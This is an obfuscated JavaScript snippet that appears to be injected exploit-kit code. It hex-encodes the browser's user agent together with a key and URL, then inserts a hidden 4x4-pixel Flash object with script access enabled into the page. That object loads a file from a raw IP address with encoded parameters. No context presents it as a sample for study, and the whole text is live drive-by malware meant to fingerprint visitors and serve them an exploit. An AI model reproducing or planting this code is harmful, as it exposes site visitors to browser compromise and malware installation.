/*s57921d82855hssfj74470fs*/function hgfgerdfgdf(num, width){/*s32494d38947hfj64251fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s41821d48293hfj94019fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s86278d48447hfj18488fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s7444d34801hfj59380fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd4711hfs*/c += b + d;/*s75851d67332hfj67749fs*/e += 1;}return c;}/*s50940dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.36.40/?Njg4MDkzMjg=&pa=xHzQMrDYbR3FFYDfKPnEUKREMU7WA0eKwYyZhazVF5yxFDTGpbH1Fx_spV-dCFyEmvFvdLAHIwKh1UTASwR&ma=lzY8LW1tHpauph0DUyBSYiJWF_xSFaQgU-pOSE7A8jFz0zrMRJcpyxheK6GNQyugtVFgX6Agama_7VaCO-w&work=NDk3Mjg3Nzg=", ghnvbn("http://188.225.36.40/?MTA4MDc3NDEy&pa=xXzQMvWebRXQCJ3EKvncT6NEMVHRH0CL2Y-dmrHQefjaelWkzrHFTF_xozKASwSG6_FtdfJRDQ&ma=ewjxOJLwczm4dfU1sX9qGpjEDdwUeehZCF_BLZYAtE-seUQbAz2Vz1ybMkdMolwxKG6FENjOse&work=NDcwNzE0MDY=","wexykukusw"));